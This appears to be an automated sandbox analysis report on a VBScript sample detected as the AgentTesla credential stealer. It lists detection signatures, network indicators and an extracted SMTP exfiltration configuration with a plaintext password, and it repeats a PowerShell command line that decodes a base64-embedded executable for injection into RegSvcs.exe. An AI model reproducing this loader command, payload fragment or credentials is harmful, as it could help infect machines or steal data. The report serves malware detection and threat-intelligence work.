Windows Analysis Report
GJ890-1286.vbs

Overview

General Information

Sample Name:	GJ890-1286.vbs
Analysis ID:	830445
MD5:	b73f50ff5bacd275282b43778180fd8e
SHA1:	98d820b8a51989b2bf9e9982de31eccf47a54fba
SHA256:	2dbfb717c5e54b04e5e174bc6e62f90c1609adeb52085a9d42184aadac74bf0f
Tags:	vbs
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

VBScript performs obfuscated calls to suspicious functions

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Wscript starts Powershell (via cmd or directly)

Very long command line found

Suspicious powershell command line found

Injects a PE file into a foreign processes

Yara detected Generic Downloader

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Java / VBScript file with very long strings (likely obfuscated code)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: GJ890-1286.vbs

ReversingLabs: Detection: 12%

Antivirus or Machine Learning detection for unpacked file

Source: 3.2.RegSvcs.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Source: 3.2.RegSvcs.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.hermosanairobi.com", "Username": "security@hermosanairobi.com", "Password": " mcdsew70@_+lks44 "}

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 195.178.106.125:443 -> 192.168.2.5:49695 version: TLS 1.0

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49696 -> 192.81.170.3:26

Yara detected Generic Downloader

Source: Yara match

File source: 1.2.powershell.exe.28b32159f18.0.raw.unpack, type: UNPACKEDPE

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-UPTIMECA AS-UPTIMECA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /public/storage_old/users/.vbb/dcos.txt HTTP/1.1Host: yorkrefrigerent.mdConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 192.81.170.3 192.81.170.3
Source: Joe Sandbox View	IP Address: 195.178.106.125 195.178.106.125

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 195.178.106.125:443 -> 192.168.2.5:49695 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695

Source: powershell.exe, 00000001.00000002.319201526.0000028B4A443000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegSvcs.exe, 00000003.00000002.822490552.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hermosanairobi.com
Source: RegSvcs.exe, 00000003.00000002.822490552.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.hermosanairobi.com
Source: powershell.exe, 00000001.00000002.311807350.0000028B31EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.311807350.0000028B3233C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://yorkrefrigerent.md
Source: powershell.exe, 00000001.00000002.311807350.0000028B32329000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yorkrefrigerent.md
Source: powershell.exe, 00000001.00000003.310430015.0000028B4A5B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.311807350.0000028B320F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yorkrefrigerent.md/public/storage_old/users/.vbb/dcos.txt
Source: powershell.exe, 00000001.00000002.311807350.0000028B32336000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yorkrefrigerent.mdx

Source: unknown

DNS traffic detected: queries for: yorkrefrigerent.md

Source: global traffic

HTTP traffic detected: GET /public/storage_old/users/.vbb/dcos.txt HTTP/1.1Host: yorkrefrigerent.mdConnection: Keep-Alive

System Summary

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALAZ+mMAAAAAAAAAAOAAAiELAVAAACYAAAAGAAAAAAAAskQAAAAgAAAAYAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGBEAABPAAAAAGAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAuCQAAAAgAAAAJgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAYAAAAAQAAAAoAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAALAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACURAAAAAAAAEgAAAACAAUAxCgAAOQaAAADAAAAAAAAAKhDAAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKAEAAAoqHgIoAwAACiqmcwQAAAqAAQAABHMFAAAKgAIAAARzBgAACoADAAAEcwcAAAqABAAABCoufgEAAARvCAAACioufgIAAARvCQAACioufgMAAARvCgAACioufgQAAARvCwAACirWfgUAAAQUKBoAAAosAisGfgUAAAQqcgEAAHDQBQAAAigPAAAKbxsAAApzHAAACoAFAAAEK9oafgYAAAQqHgKABgAABCpWcwwAAAYoHQAACnQGAAACgAcAAAQqHgIoHgAACioafgcAAAQqGigNAAAGKh4CKBIAAAoqABMwBABAAAAAAQAAEXIhAABwCxYrARZFAgAAAAIAAAAYAAAAKx8XDAd+IAAACgIXKBsAAAYsBxcKFyvbKw0IF9YMGCvSCBsx3xYKBiobMAoABQQAAAIAABFylQAAcAIoIQAACgwWKwEWRQMAAAACAAAADQAAABgAAAArIRID/hUPAAACFyviEgT+FQ4AAAIYK9cSAxZ9GAAABBkrzBID0A8AAAIoDwAACigiAAAKuH0NAAAEAygjAAAKLQ0IcqEAAHADKCQAAAoMAgh+JQAACn4lAAAKFhp+JQAAChQSAxIEKBAAAAYtBnMmAAAKegQfPCgnAAAKEwUWKwEWRRQAAAAFAAAAFQAAACQAAAAzAAAAdAAAAMAAAADTAAAA8gAAAAIBAABQAQAAZQEAAG8BAACIAQAAnAEAALABAADIAQAA3gEAAA0CAAAsAgAAXQIAADhxAgAABBEFHzTWKCcAAAoTBhcrliCzAAAAjQkAAAETBxgrhxEHFiACAAEAnhk4eP///ygoAAAKGjMWEQR7CgAABBEHKBEAAAYtHHMmAAAKehEEewoAAAQRBygSAAAGLQZzJgAACnoRBx8plBMIGjg3////EQR7CQAABBEIHtYSCRoSASgVAAAGLQZzJgAACnoRBhEJMxYRBHsJAAAEEQkoFwAABiwGcyYAAAp6BBEFH1DWKCcAAAoTChs46/7//wQRBR9U1ignAAAKEwscONj+//8RBHsJAAAEEQYRCiAAMAAAH0AoGAAABhMNHTi5/v//BS0lEQ0tIRcTDB44qf7//xEEewkAAAQWEQogADAAAB9AKBgAAAYTDRENLQZzJgAACnoRBHsJAAAEEQ0EEQsSASgWAAAGLQZzJgAACnoRBSD4AAAA1hMOHwk4W/7//wQRBRzWKCkAAAoX2hMRHwo4Rv7//xYTEh8LODz+//84nwAAAAQRDh8M1ignAAAKExMfDDgj/v//BBEOHxDWKCcAAAoTFB8NOA/+//8EEQ4fFNYoJwAAChMVHw44+/3//xEULEsRFBfaF9aNGwAAARMWHw844/3//wQRFREWFhEWjmkoKgAACh8QOM39//8RBHsJAAAEEQ0RE9YRFhEWjmkSASgWAAAGLQZzJgAACnoRDh8o1hMOHxE4nv3//xESF9YTEhESERE+WP///xENKCsAAAoTDx8SOH/9//8RBHsJAAAEEQge1hEPGhIBKBYAAAYtBnMmAAAKegQRBR8o1ignAAAKExAfEzhO/f//EQwsBBEGEw0RBx8sEQ0RENaeHxQ4Nf3//ygoAAAKGjMWEQR7CgAABBEHKBMAAAYtHHMmAAAKehEEewoAAAQRBygUAAAGLQZzJgAACnoRBHsKAAAEKBkAAAYVMwZzJgAACnreSCgsAAAKFisBFkUDAAAAAgAAABQAAAAkAAAAKyoRBHsLAAAEhCgtAAAKExcXK9sRFywHERdvLgAAChYKGCvLKC8AAAoZK8PeAhcKBioAAABBHAAAAAAAAFsAAABeAwAAuQMAAEgAAAAYAAABHgIoEgAACiobMAQA7QAAAAMAABFzMAAACiUoMQAACm8yAAAKAigzAAAKKDQAAApypQAAcHKxAABwbzUAAApytQAAcHLDAABwbzUAAApyxwAAcHLTAABwbzUAAApy1wAAcHLjAABwbzUAAApy5wAAcHL5AABwbzUAAApy/QAAcHIPAQBwbzUAAApyEwEAcHIlAQBwbzUAAApyK
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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			Jump to behavior

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 16166
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 16166			Jump to behavior

Yara signature match

Source: amsi64_4464.amsi.csv, type: OTHER	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth (Nextron Systems), description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: sslproxydump.pcap, type: PCAP	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
Source: 00000001.00000002.317073094.0000028B41F4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
Source: 00000001.00000002.311807350.0000028B3235B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
Source: 00000001.00000002.311807350.0000028B3235F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
Source: 00000001.00000002.317073094.0000028B41FAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 6008, type: MEMORYSTR	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FF9A5A720C9	1_2_00007FF9A5A720C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00F4A9D8	3_2_00F4A9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00F4C998	3_2_00F4C998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00F49DC0	3_2_00F49DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00F4A108	3_2_00F4A108

Java / VBScript file with very long strings (likely obfuscated code)

Source: GJ890-1286.vbs

Initial sample: Strings found which are bigger than 50

Source: GJ890-1286.vbs

ReversingLabs: Detection: 12%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GJ890-1286.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALAZ+mMAAAAAAAAAAOAAAiELAVAAACYAAAAGAAAAAAAAskQAAAAgAAAAYAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGBEAABPAAAAAGAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAuCQAAAAgAAAAJgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAYAAAAAQAAAAoAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAALAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACURAAAAAAAAEgAAAACAAUAxCgAAOQaAAADAAAAAAAAAKhDAAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKAEAAAoqHgIoAwAACiqmcwQAAAqAAQAABHMFAAAKgAIAAARzBgAACoADAAAEcwcAAAqABAAABCoufgEAAARvCAAACioufgIAAARvCQAACioufgMAAARvCgAACioufgQAAARvCwAACirWfgUAAAQUKBoAAAosAisGfgUAAAQqcgEAAHDQBQAAAigPAAAKbxsAAApzHAAACoAFAAAEK9oafgYAAAQqHgKABgAABCpWcwwAAAYoHQAACnQGAAACgAcAAAQqHgIoHgAACioafgcAAAQqGigNAAAGKh4CKBIAAAoqABMwBABAAAAAAQAAEXIhAABwCxYrARZFAgAAAAIAAAAYAAAAKx8XDAd+IAAACgIXKBsAAAYsBxcKFyvbKw0IF9YMGCvSCBsx3xYKBiobMAoABQQAAAIAABFylQAAcAIoIQAACgwWKwEWRQMAAAACAAAADQAAABgAAAArIRID/hUPAAACFyviEgT+FQ4AAAIYK9cSAxZ9GAAABBkrzBID0A8AAAIoDwAACigiAAAKuH0NAAAEAygjAAAKLQ0IcqEAAHADKCQAAAoMAgh+JQAACn4lAAAKFhp+JQAAChQSAxIEKBAAAAYtBnMmAAAKegQfPCgnAAAKEwUWKwEWRRQAAAAFAAAAFQAAACQAAAAzAAAAdAAAAMAAAADTAAAA8gAAAAIBAABQAQAAZQEAAG8BAACIAQAAnAEAALABAADIAQAA3gEAAA0CAAAsAgAAXQIAADhxAgAABBEFHzTWKCcAAAoTBhcrliCzAAAAjQkAAAETBxgrhxEHFiACAAEAnhk4eP///ygoAAAKGjMWEQR7CgAABBEHKBEAAAYtHHMmAAAKehEEewoAAAQRBygSAAAGLQZzJgAACnoRBx8plBMIGjg3////EQR7CQAABBEIHtYSCRoSASgVAAAGLQZzJgAACnoRBhEJMxYRBHsJAAAEEQkoFwAABiwGcyYAAAp6BBEFH1DWKCcAAAoTChs46/7//wQRBR9U1ignAAAKEwscONj+//8RBHsJAAAEEQYRCiAAMAAAH0AoGAAABhMNHTi5/v//